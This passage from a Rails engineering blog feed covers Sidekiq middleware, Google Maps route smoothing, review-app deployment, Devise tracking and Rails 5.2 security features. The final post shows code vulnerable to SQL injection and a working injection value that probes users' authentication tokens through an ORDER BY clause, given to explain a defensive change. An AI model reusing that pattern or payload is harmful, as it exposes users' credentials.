end</code></pre><p>Notice that we used <code>pop</code> to extract the last argument. Since we set the last argument to <code>current_user</code> in the client middleware, the last argument will always be the <code>current_user</code> in the server middleware.</p><p>Using <code>pop</code> also removes <code>current_user</code> from <code>job['args']</code>, which ensures the worker does not get <code>current_user</code> as an extra argument.</p><p>We used <a href="https://github.com/steveklabnik/request_store">request_store</a> to persist a global state. <code>RequestStore</code> provides per-request global storage using <code>Thread.current</code>, storing info as key-value pairs. Here's how we used it in Sidekiq workers to access the <code>current_user</code> info.</p><pre><code class="language-ruby">class DeliveryDeleteWorker
  include Sidekiq::Worker

  def perform(delivery)
    user_login = RequestStore.store[:request_user_login]
    user = User.find_by(login: user_login)
    ActivityGenerationService.new(delivery, user) if user
  end
end</code></pre><p>Now we don't need to pass <code>current_user</code> in the controller when calling the Sidekiq worker. Also, we don't need to add <code>user_login</code> as an extra argument to each Sidekiq worker every time we need to access <code>current_user</code>.</p><h2>Configure server middleware for Sidekiq test cases</h2><p>By default, Sidekiq does not run server middleware in <code>inline</code> and <code>fake</code> modes.</p><p>Because of this, <code>current_user</code> was being added in the client 
middleware but was not being extracted in the server middleware, since the server middleware was never called.</p><p>This resulted in <code>ArgumentError: wrong number of arguments (2 for 1)</code> failures in our test cases which used Sidekiq in <code>inline</code> or <code>fake</code> mode. We solved this by adding the following config:</p><pre><code class="language-ruby">Sidekiq::Testing.server_middleware do |chain|
  chain.add SidekiqServerMiddleware
end</code></pre><p>This ensures that <code>SidekiqServerMiddleware</code> is called in <code>inline</code> and <code>fake</code> mode in our test cases.</p><p>However, we found an alternative which was much simpler and cleaner. We noticed that the <code>job</code> payload is a simple hash which is pushed to Redis as it is, and is available in the server middleware as well.</p><p>Instead of adding the <code>current_user</code> as an argument in <code>job['args']</code>, we could add another key in the <code>job</code> payload itself which holds the <code>current_user</code>. Here's the modified logic.</p><pre><code class="language-ruby">class SidekiqClientMiddleware
  def call(_worker_class, job, _queue, _redis_pool = nil)
    # Set the current user login in the job payload
    job['request_user_login'] = current_user.login if defined?(current_user)
    yield
  end
end</code></pre><pre><code class="language-ruby">class SidekiqServerMiddleware
  def call(_worker, job, _queue)
    if job.key?('request_user_login')
      set_request_user(job['request_user_login'])
    end
    yield
  end

  private

  def set_request_user(request_user_login)
    RequestStore.store[:request_user_login] = request_user_login
  end
end</code></pre><p>We used a unique key, <code>request_user_login</code>, which would not conflict with the other keys in the <code>job</code> payload. Additionally, we added a check for whether the <code>request_user_login</code> key is present in the <code>job</code> payload. This is necessary because if the user calls the worker from the console, it will not have 
<code>current_user</code> set.</p><p>Apart from this, we noticed that we had multiple API services talking to each other. These services also generated user activity. A few of them didn't use <code>Devise</code> for authentication; instead, the requesting user's info was passed to them as a param in each request.</p><p>For these services, we set the request user info in <code>RequestStore.store</code> in our <code>BaseApiController</code> and changed the client middleware to use <code>RequestStore.store</code> instead of the <code>current_user</code> method.</p><p>We also initialized <code>RequestStore.store</code> in services where we used <code>Devise</code>, to make the middleware completely independent of <code>current_user</code>. Here's how our client middleware looks now.</p><pre><code class="language-ruby">class SidekiqClientMiddleware
  def call(_worker_class, job, _queue, _redis_pool = nil)
    # Set current user login in job payload
    if RequestStore.store[:request_user_login]
      job['request_user_login'] = RequestStore.store[:request_user_login]
    end
    yield
  end
end</code></pre><p>Lastly, we needed to register the client and server middleware in Sidekiq.</p><h2>Configuring Sidekiq middleware</h2><p>To enable the middleware with Sidekiq, we need to register the client middleware and the server middleware in <code>config/initializers/sidekiq.rb</code>. Here's how we did it.</p><pre><code class="language-ruby">Sidekiq.configure_client do |config|
  config.client_middleware do |chain|
    chain.add SidekiqClientMiddleware
  end
end

Sidekiq.configure_server do |config|
  config.client_middleware do |chain|
    chain.add SidekiqClientMiddleware
  end

  config.server_middleware do |chain|
    chain.add SidekiqServerMiddleware
  end
end</code></pre><p>Notice that we added <code>SidekiqClientMiddleware</code> in both the <code>configure_server</code> block and the <code>configure_client</code> block. This is because a Sidekiq job can enqueue another Sidekiq job, in which case the Sidekiq server itself will act as the 
client.</p><p>To sum it up, here's how our client middleware and server middleware finally looked.</p><pre><code class="language-ruby">class SidekiqClientMiddleware
  def call(_worker_class, job, _queue, _redis_pool = nil)
    # Set current user login in job payload
    if RequestStore.store[:request_user_login]
      job['request_user_login'] = RequestStore.store[:request_user_login]
    end
    yield
  end
end</code></pre><pre><code class="language-ruby">class SidekiqServerMiddleware
  def call(_worker, job, _queue)
    if job.key?('request_user_login')
      set_request_user(job['request_user_login'])
    end
    yield
  end

  private

  def set_request_user(request_user_login)
    RequestStore.store[:request_user_login] = request_user_login
  end
end</code></pre><p>The controller example we mentioned initially looks like:</p><pre><code class="language-ruby">class DeliveryController &lt; ApplicationController
  def update
    # update attributes
    DeliveryUpdateWorker.perform_async(params[:delivery])
    # render delivery
  end

  def destroy
    # delete attributes
    DeliveryDeleteWorker.perform_async(params[:delivery])
    # render :ok
  end
end</code></pre><pre><code class="language-ruby">class DeliveryDeleteWorker
  include Sidekiq::Worker

  def perform(delivery)
    user_login = RequestStore.store[:request_user_login]
    user = User.find_by(login: user_login)
    ActivityGenerationService.new(delivery, user) if user
  end
end</code></pre><pre><code class="language-ruby">class DeliveryUpdateWorker
  include Sidekiq::Worker

  def perform(delivery)
    user_login = RequestStore.store[:request_user_login]
    user = User.find_by(login: user_login)
    ActivityGenerationService.new(delivery, user) if user
  end
end</code></pre><p>Now we don't need to explicitly pass <code>current_user</code> to each Sidekiq job. It's available out of the box, without any changes, in all Sidekiq jobs.</p><p>As an alternative, we 
can also use <a href="https://github.com/rails/rails/pull/29180">ActiveSupport::CurrentAttributes</a>.</p><p><a href="https://www.reddit.com/r/ruby/comments/a3ecbv/passing_current_user_by_default_in_sidekiq">Discuss it on Reddit</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Optimize Google map multi-route loading with B-spline]]></title>
       <author><name>Ashish Gaur</name></author>
      <link href="https://www.bigbinary.com/blog/using-bspline-curves-to-draw-sampled-route-points-on-google-maps"/>
      <updated>2018-12-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-bspline-curves-to-draw-sampled-route-points-on-google-maps</id>
      <content type="html"><![CDATA[<p>Applications use Google maps for showing routes from point A to B. For one of our clients we needed to show delivery routes on Google maps so that the user can select multiple deliveries and then consolidate them into one single delivery. This meant we needed to show around 30 to 500 deliveries on a single map.</p><h2>Using Google Map polylines</h2><p>We used polylines to draw individual routes on Google maps.</p><p>A polyline is composed of line segments connecting a list of points on the map. The more points we use for drawing a polyline, the more detailed the final curve will be. Here's how we added route points to the map.</p><pre><code class="language-javascript">// List of latitude and longitude
let path = points.map(point =&gt; [point.lat, point.lng]);
let route_options = {
  path: path,
  strokeColor: color,
  strokeOpacity: 1.0,
  strokeWeight: mapAttributes.strokeWeight || 3,
  map: map, // google.maps.Map
};
new google.maps.Polyline(route_options);</code></pre><p>Here's an example of a polyline on a Google map. We used 422 latitude and longitude points to draw these routes, which makes them look more contiguous.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/polyline_example.png" alt="Polyline example"></p><p>We needed to show 200 deliveries on that map. On average, a delivery contains around 500 route points. This means we need to load 100,000 route points. Let's measure how much time the whole process takes.</p><h2>Loading multiple routes on a map</h2><p>Plotting a single route on a map can be done in less than a second. However, as we increase the number of routes to plot, the payload size increases, which affects the load time. This is because we have around 500 route points per delivery. If we want to show 500 deliveries on the map, then we need to load 500 * 500 = 250,000 route points. Let's benchmark the load time it takes to show deliveries on a map.</p><table><thead><tr><th>No. of deliveries</th><th>Load Time</th><th>Payload Size</th></tr></thead><tbody><tr><td>500</td><td>8.77s</td><td>12.3MB</td></tr><tr><td>400</td><td>7.76s</td><td>10.4MB</td></tr><tr><td>300</td><td>6.68s</td><td>7.9MB</td></tr><tr><td>200</td><td>5.88s</td><td>5.3MB</td></tr><tr><td>100</td><td>5.47s</td><td>3.5MB</td></tr></tbody></table><p>The load time is more than 5 seconds, which is high. What if we could decrease the payload size and still be able to plot the routes?</p><h2>Sampling route points for decreased payload size</h2><p>For each delivery we have around 500 route points. If we drop a few route points in between at a regular interval, then we'll be able to decrease the payload size. Latitude and longitude have at least 5 decimal places. We rounded them off to 1 decimal place and then picked unique values.</p><pre><code class="language-ruby">def route_lat_lng_points
  return '' unless delivery.route_lat_lng_points

  delivery.route_lat_lng_points.
    chunk { |point| [point.first.round(1), point.second.round(1)] }.
    map(&amp;:first).join(',')
end</code></pre><p>Now let's check the payload size and the load time.</p><table><thead><tr><th>No. of deliveries</th><th>Load Time</th><th>Payload Size</th></tr></thead><tbody><tr><td>500</td><td>6.52s</td><td>6.7MB</td></tr><tr><td>400</td><td>5.97s</td><td>5.5MB</td></tr><tr><td>300</td><td>5.68s</td><td>4.2MB</td></tr><tr><td>200</td><td>4.88s</td><td>2.9MB</td></tr><tr><td>100</td><td>4.07s</td><td>2.0MB</td></tr></tbody></table><p>The payload size decreased by 50 percent. However, since we sampled the data, the routes are not contiguous anymore. Here's how it looks now.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/sampled_routes.png" alt="Sampled routes"><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/contiguous_routes.png" alt="Contiguous routes"></p><p>Note that we sampled route points to a single decimal place. Notice that the routes where we did sampling appear jagged instead of contiguous. 
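The rounding-and-dedup step described above can be sketched standalone. The coordinates below are hypothetical, and `chunk` keeps only one entry per run of consecutive points that fall into the same single-decimal bucket:

```ruby
points = [
  [25.57167, -80.421271],
  [25.57201, -80.421305], # rounds into the same bucket as the previous point
  [25.676544, -80.388611],
  [25.820025, -80.386488]
]

# Group consecutive points by their coordinates rounded to one decimal
# place, then keep one (rounded) point per group.
sampled = points.
  chunk { |lat, lng| [lat.round(1), lng.round(1)] }.
  map(&:first)

p sampled # => [[25.6, -80.4], [25.7, -80.4], [25.8, -80.4]]
```

Four raw points collapse to three sampled points here; on dense real routes the reduction is much larger.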
We can solve this by using a curve fitting method to create a curve from the discrete points we have.</p><h2>Curve fitting using B-spline function</h2><p><a href="https://en.wikipedia.org/wiki/B-spline">B-spline</a>, or basis spline, is a spline function which can be used to create smooth curves best fitted to a set of control points. Here's an example of a B-spline curve created from a set of control points.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/bspline_example.png" alt="Bspline example"></p><p>We changed our previous example to use the B-spline function to generate latitude and longitude points.</p><pre><code class="language-javascript">// List of latitude and longitude
let lats = points.map(point =&gt; point.lat);
let lngs = points.map(point =&gt; point.lng);
let path = bspline(lats, lngs);
let route_options = {
  path: path,
  strokeColor: color,
  strokeOpacity: 1.0,
  strokeWeight: mapAttributes.strokeWeight || 3,
  map: map, // instance of google.maps.Map
};
new google.maps.Polyline(route_options);</code></pre><pre><code class="language-javascript">function bspline(lats, lngs) {
  let i, t, ax, ay, bx, by, cx, cy, dx, dy, lat, lng, points;
  points = [];
  for (i = 2; i &lt; lats.length - 2; i++) {
    for (t = 0; t &lt; 1; t += 0.2) {
      ax = (-lats[i - 2] + 3 * lats[i - 1] - 3 * lats[i] + lats[i + 1]) / 6;
      ay = (-lngs[i - 2] + 3 * lngs[i - 1] - 3 * lngs[i] + lngs[i + 1]) / 6;
      bx = (lats[i - 2] - 2 * lats[i - 1] + lats[i]) / 2;
      by = (lngs[i - 2] - 2 * lngs[i - 1] + lngs[i]) / 2;
      cx = (-lats[i - 2] + lats[i]) / 2;
      cy = (-lngs[i - 2] + lngs[i]) / 2;
      dx = (lats[i - 2] + 4 * lats[i - 1] + lats[i]) / 6;
      dy = (lngs[i - 2] + 4 * lngs[i - 1] + lngs[i]) / 6;
      lat =
        ax * Math.pow(t + 0.1, 3) +
        bx * Math.pow(t + 0.1, 2) +
        cx * (t + 0.1) +
        dx;
      lng =
        ay * Math.pow(t + 0.1, 3) +
        by * Math.pow(t + 0.1, 2) +
        cy * (t + 0.1) +
        dy;
      points.push(new google.maps.LatLng(lat, lng));
    }
  }
  return points;
}</code></pre><p>Source: <a href="https://johan.karlsteen.com/2011/07/30/improving-google-maps-polygons-with-b-splines/">https://johan.karlsteen.com/2011/07/30/improving-google-maps-polygons-with-b-splines</a></p><p>After the change, the plotted routes are much better. Here's how it looks now.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/bspline_routes.png" alt="Bspline routes"><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/contiguous_routes.png" alt="Contiguous routes"></p><p>The only downside is that if we zoom in on the map, we'll notice that the routes do not exactly overlap the Google map paths. Otherwise, we're able to plot almost the same routes with sampled route points. However, we still need 6.5 seconds to load 500 deliveries. How do we fix that?</p><h2>Loading deliveries in batches</h2><p>Sometimes users have up to 500 deliveries but want to change only a few of them and then use the application. Right now, the way the application is set up, users have no choice but to wait until all 500 deliveries are loaded before they can change anything. This is not ideal.</p><p>We want to show deliveries as soon as they're loaded. We added a polling mechanism that loads batches of 20 deliveries and plots each batch on the map as soon as it is loaded. 
This way the user could interact with the loaded deliveries while the remaining deliveries were still being loaded.</p><pre><code class="language-javascript">loadDeliveriesWindow(updatedState = {}, lastPage = 0, currentWindow = 1) {
  // windowSize: Size of the batch to be loaded
  // perPage: No of deliveries per page
  const { perPage, windowSize } = this.state;
  if (currentWindow &gt; perPage / windowSize) {
    // Streaming deliveries ended
    this.setState($.extend(updatedState, { windowStreaming: false }));
    return;
  }
  if (currentWindow === 1) {
    // Streaming deliveries started
    this.setState({ windowStreaming: true });
  }
  // Gets delivery data from backend
  this.fetchDeliveries(currentWindow + (lastPage * windowSize), queryParams).complete(() =&gt; {
    // Plots deliveries on map
    this.loadDeliveries();
    // Load the next batch of deliveries
    setTimeout((() =&gt; {
      this.loadDeliveriesWindow(updatedState, lastPage, currentWindow + 1);
    }).bind(this, currentWindow, updatedState, lastPage), 100);
  });
}</code></pre><p>Here's a comparison of how the user experience changed.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/streaming_deliveries.gif" alt="Streaming deliveries"><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/normal_loading.gif" alt="Normal loading"></p><p>Notice that loaded deliveries are plotted instantly and the user can start interacting with them, whereas if we load all the deliveries before plotting them, the user has to wait for all of them. This made the user experience much better when more than 100 deliveries were loaded.</p><h2>Serializing route points list without brackets</h2><p>One more optimization we did was to change how route points are serialized.</p><p>The route points after serialization contained opening and closing square brackets. 
So let's say the route points are</p><p><code>[[25.57167, -80.421271], [25.676544, -80.388611], [25.820025, -80.386488],...]</code>.</p><p>After serialization they looked like</p><p><code>[[25.57167,-80.421271], [25.676544,-80.388611], [25.820025,-80.386488],...]</code>.</p><p>For each route point we have an extra opening and closing square bracket, which can be avoided.</p><p>We could get rid of the brackets by concatenating the route points array and converting it to a string. After conversion it looked like this.</p><p><code>&quot;25.57167,-80.421271|25.676544,-80.388611|25.820025,-80.386488|...&quot;</code></p><p>On the client side we converted it back to an array. This reduced the payload size by 0.2MB for dense routes.</p><p>Note that this is a trade-off between client-side processing and network bandwidth. On modern computers the client-side processing is negligible. For our clients, network bandwidth was a crucial resource, so we optimized for network bandwidth.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Deploying feature branches to have a review app]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-feature-branches-to-have-a-review-app"/>
      <updated>2018-11-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-feature-branches-to-have-a-review-app</id>
      <content type="html"><![CDATA[<p><em>BigBinary has been working with <a href="https://gumroad.com">Gumroad</a> for a while. The following blog post has been published with permission from Gumroad, and we are very grateful to <a href="https://twitter.com/shl">Sahil</a> for allowing us to discuss the work in such an open environment.</em></p><p>A staging environment helps us test code before pushing it to production. However, it becomes hard to manage the staging environment when more people work on different parts of the application. This can be solved by implementing a system where each feature branch gets its own individual staging environment.</p><p>Heroku has a <a href="https://devcenter.heroku.com/articles/github-integration-review-apps">Review Apps feature</a> which can deploy different branches separately. <a href="https://gumroad.com">Gumroad</a> doesn't use Heroku, so we built a custom in-house solution.</p><p>The first step was to build the infrastructure. We created a new Auto Scaling Group, Application Load Balancer and route in AWS for the review apps. The load balancer and route are common to all review apps, but a new EC2 instance is created in the ASG when a new review app is commissioned.</p><p><img src="/blog_images/image review_app_architecture.jpg" alt="review app architecture"></p><p>The main challenge was to forward incoming requests to the correct server running the review app. This was made possible using <a href="https://www.nginx.com/resources/wiki/modules/lua/">Lua in nginx</a> and <a href="https://www.consul.io/">consul</a>. When a review app is deployed, it writes its IP and port to consul along with the hostname. 
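On the lookup side, consul's KV HTTP API returns the stored value base64-encoded inside a JSON array. The decoding the nginx Lua handler performs can be sketched in Ruby; the hostname and upstream below are hypothetical:

```ruby
require 'json'
require 'base64'

# Hypothetical body of GET http://172.17.0.1:8500/v1/kv/review-pr-42.example.com;
# consul base64-encodes the stored value in the "Value" field.
body = '[{"Key":"review-pr-42.example.com","Value":"MTAuMC4xLjU6MzAwMA=="}]'

data = JSON.parse(body)
upstream = Base64.decode64(data.first['Value'])
puts upstream # prints "10.0.1.5:3000"
```

This is exactly what the Lua `rewrite_by_lua` block does before setting `ngx.var.upstream` for `proxy_pass`.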
Each review app server runs an instance of <a href="https://openresty.org/en/">OpenResty</a> (Nginx + Lua modules) with the following configuration.</p><pre><code class="language-bash">server {
  listen                   80;
  server_name              _;
  server_name_in_redirect  off;
  port_in_redirect         off;

  try_files $uri/index.html $uri $uri.html @app;

  location @app {
    set $upstream &quot;&quot;;
    rewrite_by_lua '
      http   = require &quot;socket.http&quot;
      json   = require &quot;json&quot;
      base64 = require &quot;base64&quot;

      -- read upstream from consul
      host          = ngx.var.http_host
      body, c, l, h = http.request(&quot;http://172.17.0.1:8500/v1/kv/&quot; .. host)
      data          = json.decode(body)
      upstream      = base64.decode(data[1].Value)

      ngx.var.upstream = upstream
    ';

    proxy_buffering   off;
    proxy_set_header  Host $host;
    proxy_set_header  X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_redirect    off;
    proxy_pass        http://$upstream;
  }
}</code></pre><p>It forwards all incoming requests to the correct IP:PORT after looking up the hostname in consul.</p><p>The next task was to build a system to deploy the review apps to this infrastructure. We were already using Docker in both production and staging environments. We decided to extend it to deploy branches by building a Docker image for every branch with the <code>deploy-</code> prefix in the branch name. When such a branch is pushed to GitHub, a CircleCI job builds a Docker image with the code and all the necessary packages. 
This can be configured using a configuration template like this.</p><pre><code class="language-yaml">jobs:
  build_image:
    &lt;&lt;: *defaults
    parallelism: 2
    steps:
      - checkout
      - setup_remote_docker:
          version: 17.09.0-ce
      - run:
          command: |
            ci_scripts/2.0/build_docker_image.sh
          no_output_timeout: 20m

workflows:
  version: 2
  web_app:
    jobs:
      - build_image:
          filters:
            branches:
              only:
                - /deploy-.*/</code></pre><p>It also pushes static assets like JavaScript, CSS and images to an S3 bucket, from where they are served directly through a CDN. After building the Docker image, another CircleCI job runs to do the following tasks.</p><ul><li>Create a new database in RDS and configure the required credentials.</li><li>Scale up the review app's Auto Scaling Group by increasing the number of desired instances by 1.</li><li>Run redis, database migration, seed-data population, unicorn and resque instances using <a href="https://nomadproject.io">nomad</a>.</li></ul><p>The ease of deploying a review app helped increase our productivity.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Skipping devise trackable module for API calls]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/skip-devise-trackable-module-for-api-calls"/>
      <updated>2018-10-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/skip-devise-trackable-module-for-api-calls</id>
      <content type="html"><![CDATA[<p>We use the devise gem for authentication in one of our applications. This application provides an API which uses token authentication provided by the devise gem.</p><p>We were authenticating the user using an auth token for every API call.</p><pre><code class="language-ruby">class Api::V1::BaseController &lt; ApplicationController
  before_action :authenticate_user_using_x_auth_token
  before_action :authenticate_user!

  def authenticate_user_using_x_auth_token
    user_email = params[:email].presence || request.headers['X-Auth-Email']
    auth_token = request.headers['X-Auth-Token'].presence
    @user = user_email &amp;&amp; User.find_by(email: user_email)

    if @user &amp;&amp; Devise.secure_compare(@user.authentication_token, auth_token)
      sign_in @user, store: false
    else
      render_errors('Could not authenticate with the provided credentials', 401)
    end
  end
end</code></pre><p>Everything was working smoothly initially, but after a few months we started noticing a significant increase in response times during peak hours.</p><p>Because of the nature of the business, the application gets an API call for every user every minute. Sometimes the application also gets concurrent API calls for the same user. We noticed that in such cases, the users table was getting locked during the authentication process. This was resulting in cascading holdups and timeouts, as it affected other API calls which were also accessing the users table.</p><p>After looking at the monitoring information, we found that the problem was happening due to the <code>trackable</code> module of the devise gem. The <code>trackable</code> module keeps track of the user by storing the sign-in time, sign-in count and IP address information. The following queries were running for every API call and were resulting in exclusive locks on the users table.</p><pre><code class="language-sql">UPDATE users
SET last_sign_in_at = '2018-01-09 04:55:04',
    current_sign_in_at = '2018-01-09 
04:55:05',
    sign_in_count = 323,
    updated_at = '2018-01-09 04:55:05'
WHERE users.id = $1</code></pre><p>To fix this issue, we decided to skip user tracking for API calls. We don't need to track the user, as every call is stateless and every request authenticates the user.</p><p>Devise provides a hook to achieve this for certain requests through the environment of the request. As we were already using a separate base controller for API requests, it was easy to skip tracking for all API calls at once.</p><pre><code class="language-ruby">class Api::V1::BaseController &lt; ApplicationController
  before_action :skip_trackable
  before_action :authenticate_user_using_x_auth_token
  before_action :authenticate_user!

  def skip_trackable
    request.env['warden'].request.env['devise.skip_trackable'] = '1'
  end
end</code></pre><p>This fixed the issue of exclusive locks on the users table caused by the trackable module.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 Range#cover? accepts Range object as argument]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-range-cover-now-accepts-range-object"/>
      <updated>2018-10-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-range-cover-now-accepts-range-object</id>
      <content type="html"><![CDATA[<p><code>Range#cover?</code> returns true if the object passed as an argument is in the range.</p><pre><code class="language-ruby">(1..10).cover?(5)
=&gt; true</code></pre><p><code>Range#cover?</code> returns false if the object passed as an argument is non-comparable or is not in the range.</p><p>Before Ruby 2.6, <code>Range#cover?</code> used to return false if a Range object was passed as an argument.</p><pre><code class="language-ruby">&gt;&gt; (1..10).cover?(2..5)
=&gt; false</code></pre><h4>Ruby 2.6</h4><p>In Ruby 2.6, <code>Range#cover?</code> can accept a Range object as an argument. It returns true if the argument Range is equal to or a subset of the Range.</p><pre><code class="language-ruby">(1..100).cover?(10..20)
=&gt; true
(1..10).cover?(2..5)
=&gt; true
(5..).cover?(4..)
=&gt; false
(&quot;a&quot;..&quot;d&quot;).cover?(&quot;x&quot;..&quot;z&quot;)
=&gt; false</code></pre><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/9ca738927293df1c7a2a1ed7e2d6cf89527b5438">commit</a> and <a href="https://bugs.ruby-lang.org/issues/14473">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 DSL for configuring Content Security Policy]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-dsl-for-configuring-content-security-policy-header"/>
      <updated>2018-10-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-dsl-for-configuring-content-security-policy-header</id>
      <content type="html"><![CDATA[<p>Content Security Policy (CSP) is an added layer of security that helps detect and mitigate various types of attacks on our web applications, including Cross-Site Scripting (XSS) and data injection attacks.</p><h2>What is XSS?</h2><p>In this attack, the victim's browser may execute malicious scripts because the browser trusts the source of the content even when it's not coming from the correct source.</p><p><a href="https://blog.bigbinary.com/2012/05/10/xss-and-rails.html">Here is</a> our blog on XSS written some time back.</p><h2>How can CSP be used to mitigate and report this attack?</h2><p>By using CSP, we can specify the domains that are valid sources of executable scripts. A browser with CSP support will then only execute scripts loaded from these whitelisted domains.</p><p>Please note that CSP makes an XSS attack a lot harder, but it does not make XSS attacks impossible. CSP does not stop DOM-based XSS (also known as client-side XSS). To prevent DOM-based XSS, JavaScript code should be carefully written to avoid introducing such vulnerabilities.</p><p>In Rails 5.2, <a href="https://github.com/rails/rails/pull/31162">a DSL was added</a> for configuring the Content Security Policy header.</p><h2>Let's check the configuration.</h2><p>We can define a global policy for the project in an initializer.</p><pre><code class="language-ruby"># config/initializers/content_security_policy.rb
Rails.application.config.content_security_policy do |policy|
  policy.default_src :self, :https
  policy.font_src :self, :https, :data
  policy.img_src :self, :https, :data
  policy.object_src :none
  policy.script_src :self, :https
  policy.style_src :self, :https, :unsafe_inline
  policy.report_uri &quot;/csp-violation-report-endpoint&quot;
end</code></pre><p>We can override the global policy within a controller as well.</p><pre><code class="language-ruby"># Override policy inline
class PostsController &lt; ApplicationController
  content_security_policy do 
|policy|
    policy.upgrade_insecure_requests true
  end
end</code></pre><pre><code class="language-ruby"># Using mixed static and dynamic values
class PostsController &lt; ApplicationController
  content_security_policy do |policy|
    policy.base_uri :self, -&gt; { &quot;https://#{current_user.domain}.example.com&quot; }
  end
end</code></pre><h2>Content Security Policy can be deployed in report-only mode as well.</h2><p>Here is the global setting in an initializer.</p><pre><code class="language-ruby"># config/initializers/content_security_policy.rb
Rails.application.config.content_security_policy_report_only = true</code></pre><p>Here we are putting an override at the controller level.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationController
  content_security_policy_report_only only: :index
end</code></pre><p>A policy specified in the <code>content_security_policy_report_only</code> header will not be enforced, but any violations will be reported to a provided URI. We can provide this violation report URI in the <code>report_uri</code> option.</p><pre><code class="language-ruby"># config/initializers/content_security_policy.rb
Rails.application.config.content_security_policy do |policy|
  policy.report_uri &quot;/csp-violation-report-endpoint&quot;
end</code></pre><p>If both <code>content_security_policy_report_only</code> and <code>content_security_policy</code> headers are present in the same response, then the policy specified in the <code>content_security_policy</code> header will be enforced, while the <code>content_security_policy_report_only</code> policy will generate reports but will not be enforced.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 stops some raw SQL, prevents SQL injections]]></title>
       <author><name>Piyush Tiwari</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-disallows-raw-sql-in-active-record"/>
      <updated>2018-10-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-disallows-raw-sql-in-active-record</id>
      <content type="html"><![CDATA[<p>We sometimes use raw SQL in Active Record methods. This can lead to <a href="https://en.wikipedia.org/wiki/SQL_injection">SQL injection</a> vulnerabilities when we unknowingly pass unsanitized user input to the Active Record method.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController
  def index
    User.order(&quot;#{params[:order]} ASC&quot;)
  end
end</code></pre><p>Although this code looks fine on the surface, we can see the issue by looking at the example from <a href="http://rails-sqli.org/">rails-sqli</a>.</p><pre><code class="language-ruby">pry(main)&gt; params[:order] = &quot;(CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END)&quot;
pry(main)&gt; User.order(&quot;#{params[:order]} ASC&quot;)
User Load (1.0ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY (CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END) ASC
=&gt; [#&lt;User:0x00007fdb7968b508
  id: 1,
  email: &quot;piyush@example.com&quot;,
  authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]</code></pre><p>There are many Active Record methods which are vulnerable to SQL injection, and some of them are listed <a href="http://rails-sqli.org/"><code>here</code></a>.</p><p>However, in Rails 5.2 these APIs were changed so that they allow only attribute arguments and do not allow raw SQL. 
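A common complementary safeguard (our suggestion here, not part of the Rails change itself) is to allow-list user-supplied column names before they ever reach `order`. A minimal, hypothetical sketch:

```ruby
# Hypothetical allow-list: map user input to known-safe column names,
# falling back to a default for anything unexpected.
ALLOWED_ORDER_COLUMNS = %w[email created_at].freeze

def safe_order_column(param)
  ALLOWED_ORDER_COLUMNS.include?(param) ? param : 'created_at'
end

safe_order_column('email')                 # => "email"
safe_order_column('1; DROP TABLE users--') # => "created_at"
```

With this, a call like `User.order(safe_order_column(params[:order]))` never sees raw user input.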
With Rails 5.2 the change is not mandatory, but the developer will see a deprecation warning as a reminder.</p><pre><code class="language-ruby">irb(main):004:0&gt; params[:order] = &quot;email&quot;
=&gt; &quot;email&quot;
irb(main):005:0&gt; User.order(params[:order])
  User Load (1.0ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; ORDER BY email LIMIT $1  [[&quot;LIMIT&quot;, 11]]
=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, email: &quot;piyush@example.com&quot;, authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]&gt;
irb(main):008:0&gt; params[:order] = &quot;(CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END)&quot;
irb(main):008:0&gt; User.order(&quot;#{params[:order]} ASC&quot;)
DEPRECATION WARNING: Dangerous query method (method whose arguments are used as raw SQL) called with non-attribute argument(s): &quot;(CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END)&quot;. Non-attribute arguments will be disallowed in Rails 6.0. This method should not be called with user-provided values, such as request parameters or model attributes. Known-safe values can be passed by wrapping them in Arel.sql(). 
(called from irb_binding at (irb):8)
  User Load (1.2ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; ORDER BY (CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END) ASC
